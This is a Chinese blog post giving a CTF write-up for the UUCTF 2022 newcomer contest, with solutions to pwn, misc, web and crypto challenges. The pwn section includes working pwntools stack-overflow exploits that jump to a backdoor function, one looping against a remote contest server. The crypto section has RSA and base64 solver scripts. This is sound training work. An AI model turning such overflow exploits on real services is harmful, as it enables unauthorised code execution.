UUCTF2022wp_[uuctf 2022 新生赛]where is flag?-优快云博客

本文链接：https://blog.youkuaiyun.com/weixin_51701860/article/details/144564289

UUCTF writeup

writer:Pr0b1em

~~(小菜鸡二进制选手，目标全栈选手，不配)~~

PWN

babystack

下载附件，先检查保护机制，只开了NX，64位文件

在这里插入图片描述

拖入IDA查看，分别查看main函数和字符串，找到关键字符串system和bin/sh，同时发现了vuln函数，继续跟进

在这里插入图片描述

发现buf此处，其中存在栈溢出，同时发现back_door函数，现成直接用

在这里插入图片描述

构造脚本

exp

from pwn import *

#r=remote("",)
r=process('./babystack')
elf=ELF('./babystack')
context(os = "linux", arch = "amd64", log_level= "debug")

backdoor=0x400734

payload=b'a'*(0x100+8)+p64(backdoor)
r.sendlineafter("What's your name?",payload)

r.interactive()

easystack

花式栈溢出

检查保护机制，开了NX和PIE,说明基地址随机，估计得碰运气

在这里插入图片描述

IDA打开，发现内容和上一题几乎一样，唯独不同的点就是溢出空间只够一个后门函数的地址，于是撰写脚本，因为基地址为止，需要碰，所以脚本些许变化
在这里插入图片描述

exp

from pwn import *

while True:
    try:

        #p=process('./babystack')
        p=remote("43.143.7.127",28054)
        elf=ELF('./easystack')
        context(os = "linux", arch = "amd64", log_level= "debug")

        backdoor=0x1185

        payload=b'a'*(0x100+8)+p64(backdoor)
        p.sendlineafter("What's your name?",payload)

        p.interactive()
    except Exception:
        p.close()
        continue

just rce

简单的rce，通过rev指令逆序输出就得到flag，后面配上通配符绕过关键字
在这里插入图片描述

Misc

Where is flag？

流量分析，wireshark打开后导出特定分组http，发现有个flag压缩包，打开文件发现是png图片格式，010打开，这里发现缺少头文件，于是修复好，发现是个二维码，扫出来的内容存在零宽容度字符，在线网站解密得到flag。
在这里插入图片描述

搬好小板凳听故事

简单的解决，用ciphey，好一个三花淡奶！
在这里插入图片描述

村中奇怪的故事

这玩意儿图片真给我误导了，没想到就是百家姓加密，后来仔细一看悟出来了，赶紧去试，后来七七上hint也验证了我的想法。说真的，这故事够狗屎，给我看得一愣一愣，解出来之后，居然平台后台flag还是错的，给我整得怀疑人生。

蜜蜂和蛆

crc32爆破，通过pass1和pass2分别得到一段密码，然后打开得到一张画着蜜蜂和蛆的png，改宽高，得到一个二维码，扫出来base64解密，~~文件都删完了，懒得复现了~~

王八快跑

让你跑你就跑，签个到！哈哈哈哈

略略略来抓我啊

社工还是不太擅长，很久没做过了，找了很久，第一张图暴露了一个钱塘驿，直接暴露了位置，然后就找着地图找宾馆，是个眼力活，也是个体力活

web

websign

F12不管用？那我手动总行了吧！
在这里插入图片描述

Crypto

爱丽丝梦境的兔子

兔子密码、社会主义核心价值观密码和栅栏密码，简单套娃

disparity_rsa

这个rsa有手就行，我直接用RsaCTFtools解的，脚本都懒得写了，这里就不放图复现了~~（是真的懒~~

Easy_base64

import base64
# 这里有个固定的字符串是flag
# 1.根据flag的base64编码可以确定第一个字符的ASCII码对应的是90
flag = 'flag{}'
tmp = base64.b64encode(bytes(flag,"utf-8"))
print(str(tmp))

# 2.根据结果往前推ASCII码
a = [90, 55, 21, 16, 50, 105, 71, 14, 27, 41, 30, 34, 16, 50,111,74, 62, 5, 18, 54, 52,106, 85, 31, 54, 24, 111, 83, 11, 38, 1, 53, 17, 37, 17, 35, 47, 32, 52, 40, 2, 9, 59, 47, 54, 25, 111, 77, 16, 48, 26, 33, 9, 55, 108, 0]

for i in range(0, len(a)-1):
    t = a[i] ^ a[i+1]
    a[i+1] = t
    print(t, end=',')
'''
109,34,5,34,91,46,73,21,50,55,60,50,34,93,37,116,59,23,36,2,94,63,74,41,46,119,60,88,45,39,52,36,52,52,50,12,15,20,28,42,11,50,20,25,47,118,34,93,32,42,59,40,62,91,108,56
'''

b = [90, 109,120,104,90,51,116,122,97,72,86,116,100,86,57,115,77,72,90,108,88,50,103,120,78,86,57,106,97,71,70,115,98,71,86,117,90,122,78,102,100,109,86,121,79,86,57,116,100,84,78,111,102,81,61,61,104]

# 3.解密
a = b'ZmxhZ3tzaHVtdV9sMHZlX2gxNV9jaGFsbGVuZzNfdmVyOV9tdTNofQ==h'
tmp = base64.b64decode(a)
print(tmp)

unsafe_prime

这里考察的知识点就是当n不是由两个不相等的质数相乘得到的时的解法，属于另一种欧拉定理的运用，phin不再是(p-1)*(q-1)，而是p^3-p2

'''
from Crypto.Util.number import *
#from flag import flag
import libnum
p=getPrime(1024)
n=p**3
e=65537
flag='flag{luoxiheng}'
c=pow(libnum.s2n(flag),e,n)
print(n)
print(c)
#1781066779141074297846071955037887396311182371062305797790413639302252321886055189043670187843106208315282055227397316083218930657040969292641990094428330517286511511741846106485971830443788363541411679523274683568732340113625424593194464460018629545968907529693143364870519531630721083893407011154181539445417439610805148961135948617691115328261432541033785402520757881586489819563221498111411690769065511011083021336493731421274742041131952523427183184133413677315203810963447656037908287875212013900845740870561508870574734100843624059414134156975073835607712519402938132401964708681236647568922173471703538744207491065165405594141287750705055447493380970194312139898574699147098202027540057477562090764694370368571887563631557761911842054442637038169316686266784299889397326811768646649462480349219937292894824766045607723468654723947999531346474969019631500665628522355198334827965770037487344994396753505248472283247731
#1402371150275079475353867962992356093684205278224746766691813462864343871795075217989508355749642716635931824907174189358797217546624305634264458802157933311315419673854405865092102322247505412453586251582022669511221048298234732642016439123525455296325766292112758881774720932499142635136210314142144509741404827421282969081272484330382868174392651681290127032351489627054643864671335712011990584326951285867375878235135547391155357814807654366986019707719726796289990920154227959213228064918435259919697047405788311280560319520593639968900649500117511665741073545430999580686455996145426173603547052710181735901020361145546892741579951501409108067297139928103329203429485237575169217432586580425019729120741661192297552519858305628835738911159460615968385837687234565509200392302553443089729906970894661310333276852803980265040679214814192141779678148895736682538612828771031493541256243879854624644771924477873876038496224
'''
import libnum
import gmpy2
import binascii
from Crypto.Util.number import *

n=1781066779141074297846071955037887396311182371062305797790413639302252321886055189043670187843106208315282055227397316083218930657040969292641990094428330517286511511741846106485971830443788363541411679523274683568732340113625424593194464460018629545968907529693143364870519531630721083893407011154181539445417439610805148961135948617691115328261432541033785402520757881586489819563221498111411690769065511011083021336493731421274742041131952523427183184133413677315203810963447656037908287875212013900845740870561508870574734100843624059414134156975073835607712519402938132401964708681236647568922173471703538744207491065165405594141287750705055447493380970194312139898574699147098202027540057477562090764694370368571887563631557761911842054442637038169316686266784299889397326811768646649462480349219937292894824766045607723468654723947999531346474969019631500665628522355198334827965770037487344994396753505248472283247731
e=65537
p = 121216033233585299462279856144422199686140149244819402908675131452249143435823157035320400025743305736047792084067723177554239638229731651194515823556880874798950035236056266154727789682357822323822962110560589110432270068487448525123808163818606838762211746373156874518622834972063360072190758655502892772811


n = p**3
phi_n= p**3-p**2
c=1402371150275079475353867962992356093684205278224746766691813462864343871795075217989508355749642716635931824907174189358797217546624305634264458802157933311315419673854405865092102322247505412453586251582022669511221048298234732642016439123525455296325766292112758881774720932499142635136210314142144509741404827421282969081272484330382868174392651681290127032351489627054643864671335712011990584326951285867375878235135547391155357814807654366986019707719726796289990920154227959213228064918435259919697047405788311280560319520593639968900649500117511665741073545430999580686455996145426173603547052710181735901020361145546892741579951501409108067297139928103329203429485237575169217432586580425019729120741661192297552519858305628835738911159460615968385837687234565509200392302553443089729906970894661310333276852803980265040679214814192141779678148895736682538612828771031493541256243879854624644771924477873876038496224
d=gmpy2.invert(e,phi_n)
print(d)

m=pow(c,d,n)
print(m)
#print(binascii.unhexlify(hex(m)[2:]))
print(libnum.n2s(int(m)))
string = long_to_bytes(m)
print(string)